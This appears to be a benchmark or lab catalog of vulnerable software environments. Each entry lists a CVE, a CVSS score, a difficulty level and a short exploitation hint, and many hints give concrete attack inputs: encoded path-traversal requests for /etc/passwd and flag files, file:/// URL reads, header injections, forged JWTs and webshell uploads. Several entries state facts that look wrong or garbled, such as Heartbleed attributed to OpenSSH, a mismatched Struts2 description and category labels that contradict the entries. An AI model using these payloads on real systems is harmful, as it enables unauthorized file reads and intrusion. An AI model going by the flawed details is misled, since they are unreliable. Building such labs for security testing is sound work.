CVSS 7.5
EASY
PATH TRAVERSAL
π
file
Path traversal via %2e%2e URL encoding in Apache 2.4.49. GET /cgi-bin/.%2e/.%2e/.%2e/flag_proof. Enable mod_cgi for RCE.
Apache HTTP Server
CVE-2021-42013
httpd/CVE-2021-42013
CVSS 9.8
EASY
PATH TRAVERSAL
π
file
Bypass CVE-2021-41773 patch via double encoding (%%32%65%%32%65) to traverse outside docroot. Execute OS commands with mod_cgi enabled.
ImageMagick
CVE-2022-44268
imagemagick/CVE-2022-44268
CVSS 7.5
MEDIUM
PATH TRAVERSAL
π
file
Craft PNG with text chunk 'profile /flag_proof'. ImageMagick embeds file contents in output image metadata during convert. Extract via identify.
Jenkins
CVE-2024-23897
jenkins/CVE-2024-23897
CVSS 9.8
HARD
PATH TRAVERSAL
π
file
Jenkins CLI @-argument file read: use @/etc/passwd pattern to read server files. Chain with credential extraction and script console for RCE.
Kibana
CVE-2018-17246
kibana/CVE-2018-17246
CVSS 7.5
MEDIUM
PATH TRAVERSAL
π
file
LFI in Kibana console API: /api/console/api_server?sense_version=@@SENSE_VERSION&apis=../../ includes and executes arbitrary JS files from server.
Librsvg
CVE-2023-38633
librsvg/CVE-2023-38633
CVSS 7.5
MEDIUM
PATH TRAVERSAL
π
file
Path traversal in librsvg when processing SVG with xlink:href containing local file path. Embed local files in rendered SVG output.
Metabase
CVE-2021-41277
metabase/CVE-2021-41277
CVSS 7.5
EASY
PATH TRAVERSAL
π
file
Path traversal in Metabase GeoJSON API endpoint. Request /api/geojson?url=file:///flag_proof to read arbitrary files without authentication.
mini_httpd
CVE-2018-18778
mini_httpd/CVE-2018-18778
CVSS 6.5
EASY
PATH TRAVERSAL
π
file
mini_httpd path traversal allows reading files outside web root. Request GET /../../../flag_proof HTTP/1.0 to retrieve the flag file directly.
n8n
CVE-2026-21858
n8n/CVE-2026-21858
CVSS 9.8
INSANE
PATH TRAVERSAL
π
file
n8n code node sandbox escape allows RCE. Exploit prototype pollution in workflow code node to break out of VM2 sandbox and execute OS commands.
Nexus Repository Manager
CVE-2024-4956
nexus/CVE-2024-4956
CVSS 7.5
EASY
PATH TRAVERSAL
π
file
Path traversal in Nexus Repository Manager allows unauthenticated file read. GET /%2F%2F%2F%2F..%2F..%2F..%2Fetc%2Fpasswd to read sensitive files including flag.
Node.JS
CVE-2017-14849
node/CVE-2017-14849
CVSS 7.5
MEDIUM
PATH TRAVERSAL
π
file
Node.js path traversal in serve-static via encoded characters. Request /../../flag_proof with encoded slashes to read files outside web root.
PHPMailer
CVE-2017-5223
phpmailer/CVE-2017-5223
CVSS 5.3
EASY
PATH TRAVERSAL
π
file
PHPMailer local file disclosure via crafted email attachment path. Send email with file:///flag_proof as attachment to read local files through mail log.
phpMyAdmin
CVE-2018-12613
phpmyadmin/CVE-2018-12613
CVSS 8.8
HARD
PATH TRAVERSAL
π
file
phpMyAdmin local file inclusion via improper whitelist check in bf_pdf_table.php. Chain with session poisoning to include PHP session file as local code.
Python
CVE-2024-23334
python/CVE-2024-23334
CVSS 7.5
EASY
PATH TRAVERSAL
π
file
aiohttp static file serving path traversal. Request GET /static/../../../flag_proof to read files outside web root in vulnerable aiohttp versions.
Ruby on Rails
CVE-2018-3760
rails/CVE-2018-3760
CVSS 7.5
MEDIUM
PATH TRAVERSAL
π
file
Ruby on Rails path traversal in Sprockets static asset serving. Request /assets/../../../etc/passwd with encoded traversal sequences to read arbitrary files.
Ruby on Rails
CVE-2019-5418
rails/CVE-2019-5418
CVSS 7.5
MEDIUM
PATH TRAVERSAL
π
file
Rails file content disclosure via Content-Type header manipulation. Set Accept: ../../../flag_proof{{}} to trigger path traversal in template rendering.
Apache Solr
β
solr/Remote-Streaming-Fileread
CVSS 7.5
EASY
PATH TRAVERSAL
π
file
Apache Solr remote streaming file read via stream.url or stream.file parameter. Enable RemoteStreaming in solrconfig.xml then read arbitrary files via query parameter.
Apache Struts2
CVE-2023-50164
struts2/s2-066
CVSS 9.8
INSANE
PATH TRAVERSAL
π
file
Struts2 file upload path traversal and RCE via filename manipulation. Upload file with ../traversal in filename combined with multipart injection to write webshell.
Apache Struts2
CVE-2024-53677
struts2/s2-067
CVSS 9.8
INSANE
PATH TRAVERSAL
π
file
Struts2 authentication bypass via OGNL expression in token validation. Forge action token using OGNL injection to bypass token-based CSRF protection and access protected actions.
ThinkPHP
β
thinkphp/lang-rce
CVSS 9.8
HARD
PATH TRAVERSAL
π
file
ThinkPHP 6.x lang parameter local file inclusion leading to RCE. Set think-lang cookie to path traversal value, upload PHP code via another endpoint, include to execute.
uWSGI
CVE-2018-7490
uwsgi/CVE-2018-7490
CVSS 7.5
MEDIUM
PATH TRAVERSAL
π
file
uWSGI path traversal via encoded slashes in PATH_INFO. Request /..%2F..%2F..%2Fflag_proof to traverse outside document root and read flag file.
Vite
β
vite/CNVD-2022-44615
CVSS 7.5
MEDIUM
PATH TRAVERSAL
π
file
Vite dev server arbitrary file read via path traversal in URL. Request /@fs/etc/passwd or /@fs/flag_proof to read files via Vite's file system exposure in dev mode.
Vite
CVE-2025-30208
vite/CVE-2025-30208
CVSS 7.5
MEDIUM
PATH TRAVERSAL
π
file
Vite dev server path traversal bypass via query string manipulation. Append ?import& to bypass server.fs.deny restrictions and read arbitrary files from filesystem.
Discuz!
β
discuz/x3.4-arbitrary-file-deletion
CVSS 7.5
MEDIUM
UNAUTH ACCESS
π
file
Authenticated file deletion in Discuz! X3.4 via crafted avatar upload path. Delete config.inc.php to reset installation and create admin account.
Django
CVE-2017-12794
django/CVE-2017-12794
CVSS 5.0
EASY
UNAUTH ACCESS
π
file
Django debug view XSS via crafted URL. Debug mode exposes stack traces with internal paths and settings potentially leaking SECRET_KEY.
Django
CVE-2018-14574
django/CVE-2018-14574
CVSS 6.1
EASY
UNAUTH ACCESS
π
file
Open redirect in Django CommonMiddleware when APPEND_SLASH=True and DEBUG=False. Redirect to attacker-controlled URL via crafted request path.
DNS
β
dns/dns-zone-transfer
CVSS 7.5
EASY
UNAUTH ACCESS
π
file
Misconfigured DNS server allows unauthenticated zone transfer (AXFR). Query all DNS records to discover internal hostnames and IP mappings.
Apache HTTP Server
CVE-2017-15715
httpd/CVE-2017-15715
CVSS 8.1
MEDIUM
UNAUTH ACCESS
π
file
Apache HTTP Server mod_rewrite newline injection. Inject \n in redirect URL to split HTTP response and inject headers/body for cache poisoning or session fixation.
Apache HTTP Server
β
httpd/apache_parsing_vulnerability
CVSS 7.5
MEDIUM
UNAUTH ACCESS
π
file
Apache PHP CGI parsing bug: upload file.php.jpg, Apache serves it as PHP due to mod_negotiation/mod_mime misconfiguration executing PHP code.
Jetty
CVE-2021-28164
jetty/CVE-2021-28164
CVSS 5.3
EASY
UNAUTH ACCESS
π
file
Jetty path traversal via encoded double-dot segments in URI. Request /%2e/WEB-INF/web.xml bypasses security constraints to read protected resources.
Jetty
CVE-2021-28169
jetty/CVE-2021-28169
CVSS 5.3
EASY
UNAUTH ACCESS
π
file
Jetty DefaultServlet double-decoding path traversal. Request /%2F/ sequences expose file contents from outside the servlet context root.
Jetty
CVE-2021-34429
jetty/CVE-2021-34429
CVSS 5.3
MEDIUM
UNAUTH ACCESS
π
file
Jetty URI encoding bypass to access WEB-INF directory. Use %u0000 or %2F sequences to bypass security constraints and read protected files.
MinIO
CVE-2023-28432
minio/CVE-2023-28432
CVSS 7.5
MEDIUM
UNAUTH ACCESS
π₯
env
MinIO information disclosure exposes environment variables including credentials via POST /minio/health/cluster?verify. Extract MINIO_SECRET_KEY as flag.
Nginx
CVE-2013-4547
nginx/CVE-2013-4547
CVSS 7.5
MEDIUM
UNAUTH ACCESS
π
file
Nginx path traversal via null byte in URI before static file extension. Request /uploads/evil.php%00.png to execute PHP code uploaded as image file.
Nginx
CVE-2017-7529
nginx/CVE-2017-7529
CVSS 5.3
EASY
UNAUTH ACCESS
π
file
Nginx integer overflow in range filter allows memory disclosure. Send Range: bytes=-17208 header to retrieve memory contents from previous request including sensitive data.
Nginx
β
nginx/insecure-configuration
CVSS 7.5
MEDIUM
UNAUTH ACCESS
π
file
Nginx misconfiguration allows path traversal via alias directive without trailing slash. Access /static../etc/passwd by exploiting alias stripping behavior.
Nginx
β
nginx/nginx_parsing_vulnerability
CVSS 7.5
MEDIUM
UNAUTH ACCESS
π
file
Nginx+PHP-FPM path confusion vulnerability. Upload image.jpg containing PHP code, access as /image.jpg/nonexistent.php to trigger PHP-FPM execution.
Nginx UI
CVE-2026-27944
nginx-ui/CVE-2026-27944
CVSS 9.8
HARD
UNAUTH ACCESS
π
file
Nginx-UI authentication bypass via JWT algorithm confusion. Forge admin JWT token using none algorithm to access configuration API and execute nginx config injection.
OpenSSH
CVE-2018-15473
openssh/CVE-2018-15473
CVSS 5.3
EASY
UNAUTH ACCESS
π₯
env
OpenSSH user enumeration via timing difference in authentication responses. Use timing oracle to enumerate valid usernames, then brute-force credentials to login and read flag.
OpenSSL
CVE-2014-0160
openssl/CVE-2014-0160
CVSS 7.5
MEDIUM
UNAUTH ACCESS
π₯
env
Heartbleed: OpenSSH/TLS heartbeat extension buffer over-read leaks server memory. Send crafted heartbeat request to extract memory containing private keys and session tokens.
OpenSSL
CVE-2022-0778
openssl/CVE-2022-0778
CVSS 7.5
MEDIUM
UNAUTH ACCESS
π
file
OpenSSL infinite loop in BN_mod_sqrt() via crafted certificate. Trigger DoS with malformed EC certificate, then exploit accompanying service vulnerability to read flag.
ownCloud
CVE-2023-49103
owncloud/CVE-2023-49103
CVSS 7.5
EASY
UNAUTH ACCESS
π₯
env
ownCloud GraphAPI app discloses phpinfo() including environment variables. Access /apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php to extract FLAG env var.
Polkit Pkexec
CVE-2021-4034
polkit/CVE-2021-4034
CVSS 7.8
MEDIUM
UNAUTH ACCESS
π
file
Polkit pkexec local privilege escalation via argument array manipulation. Compile and run PwnKit exploit on the system to escalate to root and read /flag_proof.
PostgreSQL
CVE-2018-1058
postgres/CVE-2018-1058
CVSS 8.8
HARD
UNAUTH ACCESS
π
file
PostgreSQL search_path injection allows privilege escalation. Create malicious function in public schema that gets executed with elevated privileges when superuser runs query.
SaltStack
CVE-2020-11651
saltstack/CVE-2020-11651
CVSS 9.8
EASY
UNAUTH ACCESS
π
file
SaltStack authentication bypass in salt-master ClearFuncs. Call _send_pub() and _auth_info() methods without authentication to bypass access controls and execute commands on minions.
V2board
β
v2board/1.6-privilege-escalation
CVSS 8.8
HARD
UNAUTH ACCESS
π
file
V2Board privilege escalation via JWT secret disclosure in config. Extract JWT secret from database, forge admin token, and access privileged API endpoints.